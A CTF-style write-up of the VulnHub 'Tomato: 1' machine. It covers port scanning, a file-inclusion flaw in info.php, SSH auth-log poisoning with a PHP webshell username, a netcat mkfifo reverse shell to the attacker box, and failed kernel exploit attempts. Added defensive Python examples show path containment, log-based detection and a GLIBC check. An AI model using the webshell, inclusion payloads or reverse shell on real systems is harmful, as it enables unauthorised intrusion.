VulnHub-Tomato: 1

Published 2023-04-21 13:53:28, author: HKalpa

Target machine: https://www.vulnhub.com/entry/tomato-1,557/

Goal: get the root shell (i.e. root@localhost:~#) and then obtain the flag under /root.

I. Information Gathering

Use arp-scan to locate the target on the local subnet; the target's IP is 192.168.11.137

arp-scan -l

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1   00:50:56:f3:b5:59       VMware, Inc.
192.168.11.137 00:0c:29:29:d9:2e       VMware, Inc.
192.168.11.254 00:50:56:e2:c4:a9       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded

Use masscan to enumerate open ports; four ports are open: 8888, 80, 2211 and 21

masscan -p0-65535 192.168.11.137

┌──(root㉿kali)-[~]
└─# masscan -p0-65535 192.168.11.137
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-04-17 12:22:07 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8888/tcp on 192.168.11.137                                
Discovered open port 80/tcp on 192.168.11.137                                  
Discovered open port 2211/tcp on 192.168.11.137                                
Discovered open port 21/tcp on 192.168.11.137

Use nmap to identify the services on the open ports

nmap -sV -p8888,80,2211,21 192.168.11.137

┌──(root㉿kali)-[~]
└─# nmap -sV -p8888,80,2211,21 192.168.11.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 14:43 CST
Nmap scan report for 192.168.11.137
Host is up (0.00043s latency).

PORT     STATE SERVICE VERSION
21/tcp   open ftp     vsftpd 3.0.3
80/tcp   open http   Apache httpd 2.4.18 ((Ubuntu))
2211/tcp open ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
8888/tcp open http   nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:29:D9:2E (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.49 seconds

Use dirb to scan the web server on port 80

dirb http://192.168.11.137/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.11.137/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Apr 18 14:30:12 2023
URL_BASE: http://192.168.11.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.11.137/ ----
==> DIRECTORY: http://192.168.11.137/antibot_image/
+ http://192.168.11.137/index.html (CODE:200|SIZE:652)
+ http://192.168.11.137/server-status (CODE:403|SIZE:279)

---- Entering directory: http://192.168.11.137/antibot_image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
  (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Apr 18 14:30:14 2023
DOWNLOADED: 4612 - FOUND: 2

II. Vulnerability Discovery

Visiting http://192.168.11.137/antibot_image/ reveals a directory named antibots

The antibots directory contains a large number of files

Visiting http://192.168.11.137/antibot_image/antibots/info.php and inspecting the page source (F12) reveals a file inclusion vulnerability in the image parameter

http://192.168.11.137/antibot_image/antibots/info.php?image=/etc/passwd
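The inclusion above works because the image parameter is passed to the file system without any containment check. As an added example (not code from the original write-up or from the antibots application), the following Python shows the check that a hardened handler performs before opening a user-supplied file name: reject absolute paths and NUL bytes, resolve the candidate and confirm it still lies inside the image directory, and allow only image extensions. The directory and file names created in demo() are constructed for the demonstration.

```python
"""Added example (not from the original write-up): resolving an ``image``
parameter safely against a fixed directory, i.e. the containment check whose
absence lets info.php?image=/etc/passwd read arbitrary files.  Python stands
in for the PHP include; the directory and file names used in demo() are
constructed for the demonstration."""
import tempfile
from pathlib import Path
from typing import Dict, Optional

ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image(base_dir: str, requested: str) -> Optional[Path]:
    """Return the real path of ``requested`` inside ``base_dir``.

    Returns None when the value is empty, carries a NUL byte, is absolute,
    escapes base_dir via ../ or a symlink, has a non-image extension, or does
    not exist as a regular file.
    """
    if not requested or "\x00" in requested:
        return None
    if Path(requested).is_absolute():
        return None
    base = Path(base_dir).resolve()
    # resolve() collapses ../ segments and follows symlinks, so the
    # containment test below sees the path that would actually be opened
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    if candidate == base or candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    if not candidate.is_file():
        return None
    return candidate


def demo() -> Dict[str, Optional[str]]:
    """Run representative requests against a throw-away image directory."""
    with tempfile.TemporaryDirectory() as d:
        # constructed fixtures: one legitimate image and a script beside it
        Path(d, "screenshot-1.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed")
        Path(d, "info.php").write_text("<?php ?>")
        requests = [
            "screenshot-1.jpg",          # legitimate
            "/etc/passwd",               # absolute path, the payload used above
            "../../../../etc/passwd",    # traversal
            "/var/log/auth.log",         # log file include
            "info.php",                  # wrong type
            "missing.jpg",               # does not exist
        ]
        results = {}
        for req in requests:
            found = resolve_image(d, req)
            results[req] = found.name if found else None
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r:32} -> {outcome}")
```

Only the legitimate request resolves; every other entry in demo() returns None. The order of the checks matters: the containment test runs on the resolved path, so a symlink inside the image directory pointing outside it is rejected as well.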

III. Getting a Shell

During information gathering, port 2211 was identified as SSH, so the plan is to write a shell into the SSH log file and then include that log file.

Check whether the log file is at its default path

http://192.168.11.137/antibot_image/antibots/info.php?image=/var/log/auth.log

Connect over SSH using a PHP one-liner webshell as the username, so that it is written into the log

ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211

┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
The authenticity of host '[192.168.11.137]:2211 ([192.168.11.137]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.137]:2211' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
<?php system($_GET[cmd]);?>@192.168.11.137: Permission denied (publickey,password).
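The two halves of this chain each leave a distinctive trace: sshd records the attempted username verbatim in auth.log, and the inclusion request itself lands in the web server's access log with an absolute path in the image parameter. As an added example (not part of the original write-up), the Python below runs over a few constructed log lines that mirror that traffic and flags both: usernames that contain PHP markers or non-username characters, and requests whose image value is absolute or contains traversal. The log lines, PIDs and the tomato user are constructed for the demonstration.

```python
"""Added example, not part of the original write-up: detection logic for the
log-poisoning chain shown above.  The sample log lines are constructed to
mirror what sshd and Apache would record for that traffic."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# sshd logs the attempted username verbatim, which is exactly what makes
# auth.log a useful include target.  Longer alternatives are listed first.
SSH_RE = re.compile(
    r"sshd\[\d+\]: (?:Failed password for invalid user|Invalid user|"
    r"Failed password for|Accepted password for) (?P<user>.+?) "
    r"from (?P<ip>[0-9a-fA-F.:]+)"
)
# A sane Unix username; anything else in that field deserves a look
VALID_USER = re.compile(r"^[A-Za-z0-9._-]{1,32}$")
PHP_MARKERS = ("<?", "?>", "$_GET", "$_POST", "$_REQUEST",
               "system(", "passthru(", "shell_exec(", "eval(")

# Apache combined/common log prefix: client, ident, user, [time] "METHOD target proto" status
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_ssh_line(line: str) -> Optional[Dict]:
    """Parse one sshd line; None if it is not an authentication record."""
    m = SSH_RE.search(line)
    if not m:
        return None
    user, ip = m.group("user"), m.group("ip")
    reasons = []
    if not VALID_USER.match(user):
        reasons.append("username contains characters outside [A-Za-z0-9._-]")
    reasons += [f"PHP marker {mk!r}" for mk in PHP_MARKERS if mk in user]
    return {"user": user, "ip": ip, "suspicious": bool(reasons), "reasons": reasons}


def find_log_poisoning(auth_lines: List[str]) -> List[Dict]:
    """All sshd records whose username looks like injected code."""
    parsed = (classify_ssh_line(line) for line in auth_lines)
    return [rec for rec in parsed if rec and rec["suspicious"]]


def find_lfi_requests(access_lines: List[str], param: str = "image") -> List[Dict]:
    """Requests whose `param` value is an absolute path or contains traversal."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for value in query.get(param, []):
            v = unquote(value)  # parse_qs decoded once; a second pass catches %252e-style double encoding
            if v.startswith("/") or ".." in v or "\x00" in v:
                hits.append({"ip": m.group("ip"), "value": v, "status": m.group("status")})
    return hits


# Constructed sample input (not captured from the real machine)
AUTH_LOG = [
    "Apr 18 14:50:01 ubuntu sshd[1337]: Invalid user <?php system($_GET[cmd]);?> from 192.168.11.131",
    "Apr 18 14:50:03 ubuntu sshd[1337]: Failed password for invalid user <?php system($_GET[cmd]);?> from 192.168.11.131 port 39958 ssh2",
    "Apr 18 14:51:10 ubuntu sshd[1350]: Accepted password for tomato from 192.168.11.10 port 50000 ssh2",
    "Apr 18 14:52:00 ubuntu sshd[1362]: Invalid user admin from 10.0.0.5",
]
ACCESS_LOG = [
    '192.168.11.131 - - [18/Apr/2023:14:49:00 +0800] "GET /antibot_image/antibots/info.php?image=/etc/passwd HTTP/1.1" 200 2310',
    '192.168.11.131 - - [18/Apr/2023:14:53:30 +0800] "GET /antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=id HTTP/1.1" 200 51200',
    '192.168.11.10 - - [18/Apr/2023:14:55:00 +0800] "GET /antibot_image/antibots/info.php?image=screenshot-1.jpg HTTP/1.1" 200 8000',
    '192.168.11.10 - - [18/Apr/2023:14:56:00 +0800] "GET /index.html HTTP/1.1" 200 652',
]

if __name__ == "__main__":
    for rec in find_log_poisoning(AUTH_LOG):
        print("poisoned username from", rec["ip"], "->", rec["reasons"])
    for rec in find_lfi_requests(ACCESS_LOG):
        print("inclusion attempt from", rec["ip"], "->", rec["value"])
```

Correlating the two lists on the client address (both sets of hits above come from 192.168.11.131) is what turns two separate low-severity alerts into one clear picture of the chain; a plain "Invalid user" alert alone would be lost in ordinary brute-force noise.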

Listen on Kali

nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...

Use Burp Suite to send the reverse shell command (Ctrl+U URL-encodes the selection)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f

Upgrade to a full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 33 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.137] 39958
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/antibot_image/antibots$ ^Z
[1]+ 已停止               nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
            ls
antibot.php functions language     screenshot-1.jpg settings
assets       guide     license.txt screenshot-2.jpg table
dashboard   info.php   readme.txt   screenshot-3.jpg uninstall.php
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export SHELL=/bin/bash
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export TERM=screen
www-data@ubuntu:/var/www/html/antibot_image/antibots$ stty rows 33 columns 145
www-data@ubuntu:/var/www/html/antibot_image/antibots$ reset

IV. Privilege Escalation (failed)

Check the Linux kernel version

uname -a

www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

1. A false privilege escalation

Search for a usable exploit

searchsploit 4.4.0-21

Attempt escalation with 44300.c

┌──(root㉿kali)-[~]
└─# locate linux_x86-64/local/44300.c
/usr/share/exploitdb/exploits/linux_x86-64/local/44300.c

┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux_x86-64/local/44300.c tomato

┌──(root㉿kali)-[~]
└─# ls -al tomato |grep 44300.c
-rw-r--r--   1 root root 5959 4月18日 15:29 44300.c

View the PoC

cat 44300.c

┌──(root㉿kali)-[~/tomato]
└─# cat 44300.c
/**
EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
**/

/** decr.c **/
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/

Download and compile the exploit on Kali

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip

unzip 44300.zip

gcc decr.c -m32 -O2 -o decr

gcc pwn.c -O2 -o pwn

┌──(root㉿kali)-[~/tomato]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
--2023-04-18 15:45:10-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2575 (2.5K) [application/octet-stream]
正在保存至: “44300.zip”

44300.zip                           100%[===================================================================>]   2.51K --.-KB/s 用时 0.01s  

2023-04-18 15:45:13 (255 KB/s) - 已保存 “44300.zip” [2575/2575])


┌──(root㉿kali)-[~/tomato]
└─# unzip 44300.zip
Archive: 44300.zip
inflating: pwn.c                  
inflating: decr.c                  

┌──(root㉿kali)-[~/tomato]
└─# gcc decr.c -m32 -O2 -o decr

┌──(root㉿kali)-[~/tomato]
└─# gcc pwn.c -O2 -o pwn

┌──(root㉿kali)-[~/tomato]
└─# ls -al
总计 68
drwxr-xr-x 2 root root 4096 4月18日 15:51 .
drwx------ 33 root root 4096 4月18日 15:38 ..
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
-rw-r--r-- 1 root root 2575 4月18日 15:45 44300.zip
-rwxr-xr-x 1 root root 15572 4月18日 15:50 decr
-rw-r--r-- 1 root root 4565 2016年 4月23日 decr.c
-rwxr-xr-x 1 root root 16440 4月18日 15:51 pwn
-rw-rw-r-- 1 root root 1163 2016年 4月23日 pwn.c

Start an HTTP server on Kali

python3 -m http.server 8000

┌──(root㉿kali)-[~/tomato]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Download the exploit on the target and make it executable

wget http://192.168.11.131:8000/decr

wget http://192.168.11.131:8000/pwn

chmod 777 decr pwn

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/decr   
--2023-04-18 00:53:59-- http://192.168.11.131:8000/decr
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15572 (15K) [application/octet-stream]
Saving to: 'decr'

decr                                 100%[===================================================================>] 15.21K --.-KB/s   in 0s      

2023-04-18 00:53:59 (586 MB/s) - 'decr' saved [15572/15572]

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/pwn
--2023-04-18 00:54:09-- http://192.168.11.131:8000/pwn
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16440 (16K) [application/octet-stream]
Saving to: 'pwn'

pwn                                 100%[===================================================================>] 16.05K --.-KB/s   in 0.001s  

2023-04-18 00:54:09 (12.9 MB/s) - 'pwn' saved [16440/16440]

www-data@ubuntu:/tmp$ ls -al |grep www-data
-rw-r--r-- 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data     0 Apr 18 00:54 f
-rw-r--r-- 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$ chmod 777 decr pwn
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rwxrwxrwx 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data     0 Apr 18 00:54 f
-rwxrwxrwx 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$

Run the exploit; the escalation fails

./decr

./pwn

www-data@ubuntu:/tmp$ ./decr
bash: ./decr: No such file or directory

Note: reports online claim that compiling the exploit as 64-bit makes the escalation work

gcc decr.c -m64 -O2 -o decr

gcc pwn.c -m64 -O2 -o pwn

2. The "real" escalation circulating online (also false)

A GitHub search turns up an exploit for CVE-2017-6074 that is claimed to work on this kernel version

https://github.com/kkamagui/linux-kernel-exploits

Download and compile the exploit on Kali

git clone https://github.com/kkamagui/linux-kernel-exploits.git

cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/

┌──(root㉿kali)-[~/tomato]
└─# git clone https://github.com/kkamagui/linux-kernel-exploits.git
正克隆到 'linux-kernel-exploits'...
remote: Enumerating objects: 39, done.
remote: Total 39 (delta 0), reused 0 (delta 0), pack-reused 39
接收对象中: 100% (39/39), 37.83 KiB | 27.00 KiB/s, 完成.
处理 delta 中: 100% (3/3), 完成.

┌──(root㉿kali)-[~/tomato]
└─# cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 32
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root   37 4月18日 16:08 compile.sh
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ./compile.sh

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 56
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root   37 4月18日 16:08 compile.sh
-rwxr-xr-x 1 root root 23096 4月18日 16:39 CVE-2017-6074
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c

Start the HTTP server

python3 -m http.server 8000

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# pwd
/root/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Download the exploit on the target and make it executable

wget http://192.168.11.131:8000/CVE-2017-6074

chmod 777 CVE-2017-6074

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/CVE-2017-6074
--2023-04-18 01:42:07-- http://192.168.11.131:8000/CVE-2017-6074
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23096 (23K) [application/octet-stream]
Saving to: 'CVE-2017-6074'

CVE-2017-6074                       100%[===================================================================>] 22.55K --.-KB/s   in 0s      

2023-04-18 01:42:07 (877 MB/s) - 'CVE-2017-6074' saved [23096/23096]

www-data@ubuntu:/tmp$ ls -al |grep CVE-2017-6074
-rw-r--r-- 1 www-data www-data 23096 Apr 18 01:39 CVE-2017-6074
www-data@ubuntu:/tmp$ chmod 777 CVE-2017-6074

Run the exploit

./CVE-2017-6074

www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)

3. Resolving the GLIBC version

  1. Check the target's GLIBC version

    ldd --version

  2. Set up the glibc-all-in-one environment

  3. Install and configure patchelf

    git clone https://github.com/NixOS/patchelf.git

    cd patchelf

    ./bootstrap.sh

    ./configure

    make

    make check

    make install

  4. Download and configure the specific glibc version

    • List the available versions

      cat old_list # check which list file matches the version you need (cat list)

    • Download the 64-bit GLIBC 2.34

      ./download_old 2.34-0ubuntu3_amd64 # check whether the old download script is the right one (./download)

  5. Compile (the key step); either of the two forms below works

    Note:

    1. The GLIBC path must be absolute

    2. -Wl,--rpath specifies the directory containing ld-linux-x86-64.so.2

    3. -Wl,--dynamic-linker specifies the ld-linux-x86-64.so.2 file itself

    • gcc -Wl,--rpath=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ -Wl,--dynamic-linker=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2 -s CVE-2017-6074.c -o exp

    • gcc -Wl,-rpath='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/',-dynamic-linker='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2' -s CVE-2017-6074.c -o exp

    -Wl,--rpath=[directory containing the ld-linux-x86-64.so.2 of the chosen GLIBC version] # absolute path

    -Wl,--dynamic-linker=[the ld-linux-x86-64.so.2 file of the chosen GLIBC version] # absolute path

    -s: specifies the file to compile; the option can be omitted

    -o: specifies the output file name; both the option and its argument can be omitted
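The "version `GLIBC_2.34' not found" error is the target's dynamic loader refusing a binary that was built against a newer libc than the one installed there. That mismatch can be caught on the build host before anything is copied: the symbol versions a binary requires are stored as NUL-terminated "GLIBC_x.y" strings in its dynamic string table, so the highest one can be compared against the target's version from step 1. The Python below is an added example (not the write-up's own method); SAMPLE_ELF is a constructed byte string standing in for a binary, not a real ELF, and the 2.23 figure is the glibc version that ships with Ubuntu 16.04, which this 4.4.0-21 kernel belongs to. Confirm it on the target with ldd --version as step 1 does.

```python
"""Added example, not part of the original write-up: a pre-flight check of
which GLIBC symbol versions an ELF binary demands, so that a
"version `GLIBC_2.34' not found" failure is caught on the build host instead
of on the target.  SAMPLE_ELF is a constructed byte string, not a real binary;
2.23 is the glibc version shipped with Ubuntu 16.04."""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, ...]

# glibc symbol versions appear as NUL-terminated "GLIBC_x.y[.z]" strings in
# the dynamic string table (.dynstr) referenced from .gnu.version_r
GLIBC_RE = re.compile(rb"GLIBC_(\d+(?:\.\d+)+)\x00")


def parse_version(text: str) -> Version:
    """'2.2.5' -> (2, 2, 5), so tuples compare numerically, not lexically."""
    return tuple(int(part) for part in text.split("."))


def required_glibc_versions(elf: bytes) -> List[Version]:
    """Every distinct GLIBC version the binary references, ascending."""
    return sorted({parse_version(m.group(1).decode("ascii")) for m in GLIBC_RE.finditer(elf)})


def highest_required(elf: bytes) -> Optional[Version]:
    versions = required_glibc_versions(elf)
    return versions[-1] if versions else None


def will_load(elf: bytes, target_glibc: str) -> Tuple[bool, str]:
    """Return (ok, explanation) for running `elf` on a host whose libc is target_glibc."""
    newest = highest_required(elf)
    if newest is None:
        return True, "no GLIBC version references found (static or non-glibc binary)"
    target = parse_version(target_glibc)
    dotted = ".".join(map(str, newest))
    if newest <= target:
        return True, f"needs GLIBC_{dotted}, target has {target_glibc}"
    return False, f"needs GLIBC_{dotted} but target has {target_glibc}: the loader will refuse it"


def check_file(path: str, target_glibc: str) -> Tuple[bool, str]:
    """Run the check on a real file, e.g. check_file('./exp', '2.23')."""
    with open(path, "rb") as fh:
        return will_load(fh.read(), target_glibc)


# Constructed stand-in for a binary built on a current Kali; the string-table
# fragment is the kind of thing `strings exp | grep GLIBC` prints
SAMPLE_ELF = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
              + b"libc.so.6\x00GLIBC_2.2.5\x00GLIBC_2.34\x00GLIBC_2.4\x00")

if __name__ == "__main__":
    ok, why = will_load(SAMPLE_ELF, "2.23")
    print("OK" if ok else "WILL NOT LOAD", "-", why)
```

Run check_file on the compiled binary with the version reported by ldd --version before copying it anywhere. One caveat on the -rpath/-dynamic-linker approach in step 5: both flags bake an absolute path on the build machine into the binary, and that path has to exist on whichever host runs it, so the loader location must be valid there as well.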

The escalation kept failing, which is strange.

Giving up~~~